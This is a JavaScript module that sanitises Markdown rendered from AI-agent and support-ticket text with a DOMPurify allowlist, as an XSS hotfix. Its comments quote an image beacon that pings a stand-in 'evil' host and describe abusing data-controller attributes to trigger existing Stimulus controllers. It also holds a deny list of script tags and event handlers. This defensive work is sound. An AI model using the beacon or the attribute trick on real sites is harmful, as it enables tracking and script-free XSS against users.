import DOMPurify from "dompurify"
import { marked } from "marked"

// Single shared owner of BOTH the marked configuration AND the
// sanitisation pass. This is the ONLY place in the codebase where
// Markdown becomes HTML — every call site that used to do
// `el.innerHTML = marked.parse(text)` must import `renderMarkdown` from
// here instead.
//
// Why this exists (CONEK security hotfix, "Defect 1"): `marked` renders
// raw HTML embedded in Markdown source verbatim — it is a Markdown
// renderer, not a sanitiser. Model output can contain attacker-authored
// text verbatim (e.g. a support ticket body echoed back to the agent via
// packs/ai/app/services/operations/support/find_ticket.rb), so assigning
// `marked.parse()` output straight to `innerHTML` is a stored-XSS path.
// DOMPurify.sanitize() closes it.

// Custom renderer: links open in a new tab, never leak an opener, and
// never trigger a Turbo visit (Turbo would otherwise try to navigate the
// SPA-style frame to an arbitrary external href).
const renderer = new marked.Renderer()
renderer.link = ({ href, title, text }) => {
  const titleAttr = title ? ` title="${title}"` : ""
  return `<a href="${href}"${titleAttr} target="_blank" rel="noopener noreferrer" data-turbo="false">${text}</a>`
}

marked.setOptions({ renderer, breaks: true, gfm: true })

// Allow exactly the formatting the companion/KB surfaces actually emit:
// paragraphs, emphasis, lists, links, inline code, fenced code blocks,
// tables, headings, and blockquotes (the companion system prompt
// explicitly asks the model to use blockquotes). Everything else —
// script, style, iframe, object, forms, event-handler attributes,
// javascript:/data: URLs — is stripped by DOMPurify because it is simply
// not in these allowlists.
const SANITIZE_CONFIG = {
  ALLOWED_TAGS: [
    "p",
    "br",
    "hr",
    "strong",
    "b",
    "em",
    "i",
    "u",
    "del",
    "s",
    "code",
    "pre",
    "ul",
    "ol",
    "li",
    "a",
    "blockquote",
    "table",
    "thead",
    "tbody",
    "tr",
    "th",
    "td",
    "h1",
    "h2",
    "h3",
    "h4",
    "h5",
    "h6",
  ],
  // `img` is DELIBERATELY omitted. kb_editor_controller.js previously used
  // DOMPurify's permissive default allowlist, which does allow <img>, so this is
  // a knowing behaviour change: markdown/HTML images now render as nothing in the
  // KB preview. Nothing in the codebase authors KB content with images today
  // (searched fixtures, factories, seeds and the editor views), and allowing it
  // here would hand attacker-authored ticket text a remote-fetch beacon in the
  // support agent's browser — `<img src="https://evil/?c=…">` needs no script to
  // report that an agent opened a ticket. If KB genuinely needs inline images,
  // add `img` + `src`/`alt` for that renderer specifically rather than widening
  // the companion transcript's allowlist.
  ALLOWED_ATTR: ["href", "title", "target", "rel", "data-turbo", "class"],
  // CRITICAL: ALLOW_DATA_ATTR defaults to TRUE in DOMPurify and is evaluated
  // INDEPENDENTLY of ALLOWED_ATTR — supplying the allowlist above does NOT
  // restrict `data-*`. Every attribute matching /^data-[\w.-]+$/ survives
  // unless this is explicitly false.
  //
  // In a Hotwire codebase that is a script-free XSS equivalent: 200+ Stimulus
  // controllers are already mounted, so a surviving
  // `data-controller="…" data-action="click->…#method"` pair on an allowed tag
  // lets attacker-authored ticket text invoke an existing controller's methods
  // without executing any JavaScript of its own. Verified empirically — before
  // this flag, `data-controller="ai--companion"` passed through untouched.
  //
  // packs/docs/app/models/markdown_renderer.rb:126 guards the same vector
  // ("Intentionally NO data-controller / data-action in the :all" allowlist).
  // `data-turbo` still survives because it is named in ALLOWED_ATTR, which is
  // consulted regardless of this flag.
  ALLOW_DATA_ATTR: false,
  // Belt-and-braces on top of the ALLOWED_TAGS allowlist: explicitly
  // forbid the classic script-execution surfaces even if a future edit
  // widens ALLOWED_TAGS carelessly.
  FORBID_TAGS: ["script", "style", "iframe", "object", "embed", "form"],
  FORBID_ATTR: ["style", "onerror", "onload", "onclick"],
}

/**
 * Render a Markdown string to sanitised, safe-to-assign-to-innerHTML HTML.
 *
 * @param {string | null | undefined} markdown
 * @returns {string} Sanitised HTML string.
 */
export function renderMarkdown(markdown) {
  const html = marked.parse(markdown ?? "")
  return DOMPurify.sanitize(html, SANITIZE_CONFIG)
}
